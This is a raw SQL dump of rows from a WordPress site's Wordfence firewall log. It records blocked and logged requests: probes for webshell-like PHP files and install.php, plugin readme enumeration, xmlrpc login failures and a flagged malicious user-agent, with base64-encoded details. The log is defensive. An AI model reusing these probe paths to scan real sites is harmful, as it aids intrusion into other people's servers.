(50366, 1711139932.687347, 1711139932.278100, '\0\0\0\0\0\0\0\0\0\0ÿÿ­ù4z', 0, 403, 0, 0, 0, 'https://happythinking.com/simple.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3NpbXBsZS5waHA=","category":"brute-force","ssl":1}'),
(50379, 0.000000, 1711146911.820681, '\0\0\0\0\0\0\0\0\0\0ÿÿ\\5`‰', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50380, 0.000000, 1711146913.579066, '\0\0\0\0\0\0\0\0\0\0ÿÿ#Ö¾Ô', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50367, 1711139925.772788, 1711139925.346900, '\0\0\0\0\0\0\0\0\0\0ÿÿ­ù4z', 0, 403, 0, 0, 0, 'https://happythinking.com/style.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3N0eWxlLnBocA==","category":"brute-force","ssl":1}'),
(50376, 0.000000, 1711146905.270812, '\0\0\0\0\0\0\0\0\0\0ÿÿ-wÔ<', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36', 'loginFailInvalidUsername', NULL, NULL),
(50377, 1711146907.932597, 1711146907.501700, '\0\0\0\0\0\0\0\0\0\0ÿÿŒîXS', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', NULL, 'Mozilla/5.0 (Linux; Android 10; SM-N960U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{"learningMode":0,"failedRules":"","paramKey":"","paramValue":"","path":"L3htbHJwYy5waHA="}'),
(50378, 1711146905.931916, 1711146904.899000, '\0\0\0\0\0\0\0\0\0\0ÿÿŒîXS', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{"learningMode":0,"failedRules":"","paramKey":"","paramValue":"","path":"L3htbHJwYy5waHA="}'),
(50368, 1711139912.889642, 1711139912.574800, '\0\0\0\0\0\0\0\0\0\0ÿÿ­ù4z', 0, 403, 0, 0, 0, 'https://happythinking.com/chosen.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Nob3Nlbi5waHA=","category":"brute-force","ssl":1}'),
(50375, 0.000000, 1711146904.626945, '\0\0\0\0\0\0\0\0\0\0ÿÿ¨wi', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0', 'loginFailInvalidUsername', NULL, NULL),
(51362, 0.000000, 1712320295.362998, '\0\0\0\0\0\0\0\0\0\0ÿÿ1#±', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51454, 0.000000, 1712320672.571232, '\0\0\0\0\0\0\0\0\0\0ÿÿ­"IP', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51455, 0.000000, 1712320675.861477, '\0\0\0\0\0\0\0\0\0\0ÿÿÅûÊ', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50710, 0.000000, 1711816123.591897, '\0\0\0\0\0\0\0\0\0\0ÿÿKw“$', 0, 503, 0, 0, 0, 'https://happythinking.com/wp-login.php', 'https://happythinking.com/wp-login.php?redirect_to=https%3A%2F%2Fhappythinking.com%2Fwp-admin%2F', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50711, 1711816878.062289, 1711816877.713800, '\0\0\0\0\0\0\0\0\0\0ÿÿ­ù4x', 0, 403, 0, 0, 0, 'https://happythinking.howequipmentworks.com/simple.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3NpbXBsZS5waHA=","category":"brute-force","ssl":1}'),
(50512, 1711394438.454294, 1711394438.031800, '\0\0\0\0\0\0\0\0\0\0ÿÿæ-Ã', 0, 403, 0, 0, 0, 'https://happythinking.com/blog/wp-admin/install.php', NULL, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 'blocked:waf', 'WordPress New Install File Probing', '{"learningMode":0,"failedRules":"506","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L2Jsb2cvd3AtYWRtaW4vaW5zdGFsbC5waHA=","path":"L2Jsb2cvd3AtYWRtaW4vaW5zdGFsbC5waHA=","category":"discovery-and-probing","ssl":1}'),
(51696, 1712368006.512605, 1712368006.104900, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/wp-yasslideshow/readme.txt', NULL, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC15YXNzbGlkZXNob3cvcmVhZG1lLnR4dA==","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC15YXNzbGlkZXNob3cvcmVhZG1lLnR4dA==","category":"discovery-and-probing","ssl":1}'),
(50811, 1712000687.770406, 1712000687.359400, '\0\0\0\0\0\0\0\0\0\0ÿÿ_ÓD', 0, 200, 0, 0, 0, 'https://happythinking.com/wp-content/plugins/gotmls/readme.txt', NULL, 'Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Mobile/15E148 Safari/604.1', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9nb3RtbHMvcmVhZG1lLnR4dA==","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9nb3RtbHMvcmVhZG1lLnR4dA==","category":"discovery-and-probing","ssl":1}'),
(50625, 1711731954.604508, 1711731954.049300, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹c>o', 0, 403, 0, 0, 0, 'https://www.happythinking.com///dropdown.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly8vZHJvcGRvd24ucGhw","category":"brute-force","ssl":1}'),
(50541, 1711430191.543099, 1711430191.189600, '\0\0\0\0\0\0\0\0\0\0ÿÿ¹œ¬¦', 0, 403, 0, 0, 0, 'https://happythinking.com/', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV09XNjQ7IHJ2OjQ1LjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNDUuMA==","path":"Lw==","category":"brute-force","ssl":1}'),
(50542, 1711442136.147608, 1711442135.455100, '\0\0\0\0\0\0\0\0\0\0ÿÿ­ù4z', 0, 403, 0, 0, 0, 'https://happythinking.howequipmentworks.com/wp-content/inputs.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvaW5wdXRzLnBocA==","category":"brute-force","ssl":1}'),
(50562, 1711583773.843527, 1711583773.513000, '\0\0\0\0\0\0\0\0\0\0ÿÿ“-H½', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', 'https://www.happythinking.com/wp-login.php', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{"learningMode":0,"failedRules":"","paramKey":"","paramValue":"","path":"L3dwLWxvZ2luLnBocA=="}'),
(50547, 1711487313.142382, 1711487312.830700, '\0\0\0\0\0\0\0\0\0\0ÿÿ§Vnd', 0, 403, 0, 0, 0, 'https://happythinking.com/simple.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3NpbXBsZS5waHA=","category":"brute-force","ssl":1}'),
(50287, 1711080816.600072, 1711080816.245700, '\0\0\0\0\0\0\0\0\0\0ÿÿ›…\Z)', 0, 403, 0, 0, 0, 'https://www.happythinking.com/upfile.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3VwZmlsZS5waHA=","category":"brute-force","ssl":1}'),
(50293, 1711080794.972936, 1711080794.628700, '\0\0\0\0\0\0\0\0\0\0ÿÿ›…\Z)', 0, 403, 0, 0, 0, 'https://www.happythinking.com/index.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2luZGV4LnBocA==","category":"brute-force","ssl":1}'),
(50285, 1711080824.577358, 1711080824.247700, '\0\0\0\0\0\0\0\0\0\0ÿÿ›…\Z)', 0, 403, 0, 0, 0, 'https://www.happythinking.com/wp-conflg.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbmZsZy5waHA=","category":"brute-force","ssl":1}'),
(50511, 1711394440.542111, 1711394440.226900, '\0\0\0\0\0\0\0\0\0\0ÿÿæ-Ã', 0, 403, 0, 0, 0, 'https://happythinking.com/cms/wp-admin/install.php', NULL, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 'blocked:waf', 'WordPress New Install File Probing', '{"learningMode":0,"failedRules":"506","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L2Ntcy93cC1hZG1pbi9pbnN0YWxsLnBocA==","path":"L2Ntcy93cC1hZG1pbi9pbnN0YWxsLnBocA==","category":"discovery-and-probing","ssl":1}'),
(50970, 1712207483.037842, 1712207482.348100, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ðD', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/x.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3gucGhw","category":"brute-force","ssl":1}'),
(51828, 0.000000, 1712420617.130189, '\0\0\0\0\0\0\0\0\0\0ÿÿÁÞ`', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51702, 1712368017.377632, 1712368016.946300, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/wp-powerplaygallery/readme.txt', NULL, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.6', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1wb3dlcnBsYXlnYWxsZXJ5L3JlYWRtZS50eHQ=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1wb3dlcnBsYXlnYWxsZXJ5L3JlYWRtZS50eHQ=","category":"discovery-and-probing","ssl":1}'),
(51700, 1712368003.987143, 1712368003.576600, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/wp-carouselslideshow/readme.txt', NULL, 'Mozilla/5.0 (iPod touch; CPU iPhone OS 14_3 like Mac OS X) AppleWebKit/604.5.6 (KHTML, like Gecko) FxiOS/122.0 Mobile/15E148 Safari/605.1.15', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1jYXJvdXNlbHNsaWRlc2hvdy9yZWFkbWUudHh0","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1jYXJvdXNlbHNsaWRlc2hvdy9yZWFkbWUudHh0","category":"discovery-and-probing","ssl":1}'),
(51701, 1712368017.377992, 1712368016.946300, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/wp-powerplaygallery/readme.txt', NULL, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.6', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC51cmk=","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1wb3dlcnBsYXlnYWxsZXJ5L3JlYWRtZS50eHQ=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1wb3dlcnBsYXlnYWxsZXJ5L3JlYWRtZS50eHQ=","category":"discovery-and-probing","ssl":1}'),
(51822, 0.000000, 1712408323.493588, '\0\0\0\0\0\0\0\0\0\0ÿÿÁÞ`', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51823, 0.000000, 1712410785.886124, '\0\0\0\0\0\0\0\0\0\0ÿÿÁÞ`', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51824, 0.000000, 1712413240.320239, '\0\0\0\0\0\0\0\0\0\0ÿÿÁÞ`', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51825, 0.000000, 1712415695.799455, '\0\0\0\0\0\0\0\0\0\0ÿÿÁÞ`', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51826, 0.000000, 1712418149.619027, '\0\0\0\0\0\0\0\0\0\0ÿÿÁÞ`', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51827, 0.000000, 1712420259.444098, '\0\0\0\0\0\0\0\0\0\0ÿÿÄ¾:', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51732, 1712368235.187743, 1712368234.893100, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/downloads-manager/readme.txt', NULL, 'Mozilla/5.0 (iPhone; CPU iPhone OS 16_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.2 Mobile/15E148 Safari/604.2.82', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC51cmk=","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9kb3dubG9hZHMtbWFuYWdlci9yZWFkbWUudHh0","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9kb3dubG9hZHMtbWFuYWdlci9yZWFkbWUudHh0","category":"discovery-and-probing","ssl":1}'),
(51733, 1712368235.187500, 1712368234.893100, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/downloads-manager/readme.txt', NULL, 'Mozilla/5.0 (iPhone; CPU iPhone OS 16_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.2 Mobile/15E148 Safari/604.2.82', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9kb3dubG9hZHMtbWFuYWdlci9yZWFkbWUudHh0","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9kb3dubG9hZHMtbWFuYWdlci9yZWFkbWUudHh0","category":"discovery-and-probing","ssl":1}'),
(51739, 1712368250.385232, 1712368249.992400, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/simple-ads-manager/readme.txt', NULL, 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36 Edg/100.0.1185.39', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9zaW1wbGUtYWRzLW1hbmFnZXIvcmVhZG1lLnR4dA==","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9zaW1wbGUtYWRzLW1hbmFnZXIvcmVhZG1lLnR4dA==","category":"discovery-and-probing","ssl":1}'),
(51734, 1712368232.813536, 1712368232.482500, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/cnhk-slideshow/readme.txt', NULL, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:72.0) Gecko/20100101 Firefox/72.0', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC51cmk=","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9jbmhrLXNsaWRlc2hvdy9yZWFkbWUudHh0","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9jbmhrLXNsaWRlc2hvdy9yZWFkbWUudHh0","category":"discovery-and-probing","ssl":1}'),
(51838, 1712425997.585986, 1712425997.252000, '\0\0\0\0\0\0\0\0\0\0ÿÿ’¾`v', 0, 403, 0, 0, 0, 'https://happythinking.com/test/wp-admin/install.php', NULL, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 'blocked:waf', 'WordPress New Install File Probing', '{"learningMode":0,"failedRules":"506","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3Rlc3Qvd3AtYWRtaW4vaW5zdGFsbC5waHA=","path":"L3Rlc3Qvd3AtYWRtaW4vaW5zdGFsbC5waHA=","category":"discovery-and-probing","ssl":1}'),
(51816, 1712406462.616941, 1712406462.199200, '\0\0\0\0\0\0\0\0\0\0ÿÿ’¾`v', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-content/themes/classic/inc/index.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvdGhlbWVzL2NsYXNzaWMvaW5jL2luZGV4LnBocA==","category":"brute-force","ssl":1}'),
